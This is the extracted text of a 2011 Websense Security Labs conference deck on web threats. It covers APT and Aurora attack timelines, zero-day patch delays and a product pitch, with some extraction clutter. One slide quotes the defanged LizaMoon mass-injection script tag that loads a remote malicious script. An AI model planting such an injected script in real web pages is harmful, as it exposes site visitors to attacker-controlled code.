Challenges In The Morphing Threat Landscape Apr 2011, Arnhem Tamas Rudnai, Websense Security Labs

Challenges In The Morphing Threat LandscapeApr 2011, Arnhem

Tamas Rudnai, Websense Security Labs

Agenda

How Has The Threat Landscape Changed?

Advanced Persistent Threats

Web 2.0

Blended Threats

Websense Security Labs

Something has Changed

Rich Internet ApplicationsRich Internet Applications

Cloud ComputingCloud Computing

Social WebSocial Web

Threat Report 2010

111% increase in number of malicious websites from 2009 to 2010

80% of malicious sites we see were legitimate

Since April ‘10, the ThreatSeeker

Network has identified

between 1 and 2 million

malicious sites per month

Threat Report 2010...continued

52% of web-based attacks are data-stealing

9 out of 10 unwanted emailscontain a URL

84% of email messageswere spam

More info: http://www.websense.com/threatreport2010

Top Compromised Site Categories

24.30%

8.20%

6.80%

5.80%

5.80%

Business and EconomyTravelSexSportsEducation

Advanced Persistent Threats

APT

Advanced: They know what they are doing!

Persistent: They have a mission.

Threats: They are funded, motivated, organized, and connected

“Aurora” Timeline

* Independent firm, Virus Total** Websense Security Labs

February 23Intel confirms “sophisticated” attacks

coinciding with Google’s

Week of February 22 200+ sites use the exploit to deliver other malware**

January 21Microsoft patch released.

Only 26% of AV vendors offer protection*

January 16Exploit code available

January 140-day identified publicly

January 12Google announcement

SitesCompromised

9 Days

Nov-Dec, 2009Multiple phishing

attacks

Anatomy of Aurora

1

Corporate Network

1 Exploit code posted to target and Web 2.0 enabled sites

2 Spoofed emails sent to target companies with URL lure to infected Web site

3 Employees clicked on lures in emails and on social networking sites and became infected

4 Infected machines sent sensitive information via the Web to host Web sites

3

AV & URLFilters

4

Email & URLFilters

2

Email Filters

http://http://

http://http://

0-day Timeline

2010

June July August September

Total of 79 Days of vulnerable software and counting…

6 Days to patch Adobe Flash 25 Days to patch Adobe Acrobat Reader

15 Days to patch

9 Days to patch

17 Days to patch

7 Days to patch

Adobe Flash and Acrobat Reader CVE-2010-1297

Microsoft LNK Vulnerability CVE-2010-2568

JailbreakMe drive-by attacks on iOS

Apple QuickTime “_MARSHALES_PUNK” 0-day CVE-2010-1818

Adobe Flash CVE-2010-2884

27 Days to patch

Adobe Acrobat Reader CVE-2010-2883

Modern Security for Modern Threats

01010101010101010001011010110111010101110111

ThreatSeekerNetwork

1101

0101

0101

0101

1001

0110

0101

0100

1010

1010

10

0101

0101

0001

0001

1001

0101

0110

1001

10

1010

0011

1101

0100

0110

0100

1010

1010

1001

1101

0100

1001

0110

1010

0101

0100

1011

0101

1001

1010

0011

1010

1011

1000

11

0101010101010101000

ACE protects customers against the most complex known and unknown threats in the areas of; web

exploits, web 2.0, malware, data leakage, and real-time content classification in 95+ categories.

ACE: Composite Security Engine

PreciseID

Reputation

Anti-SPAM

Real-timeWeb 2.0 Classification

Real-Time Security Classification

URL Classification

Antivirus ++

• Fingerprints Known Good, Known Bad

• StatisticalMachine Learning

• Logical Regular Expressions

• Reputation Contextual

• CorrelationCombining Analytics

All-purpose real-time analytics

All major content types supported

LizaMoon – Mass Injection

<script src=hxxp://lizamoon.com/ur.php></script>

LizaMoon – Mass Injection

?Q & A

Thank You

Websense Security Labs’ Bloghttp://securitylabs.websense.com/

@websenselabshttp://twitter.com/websenselabs

Keep in touchhttp://twitter.com/trudnai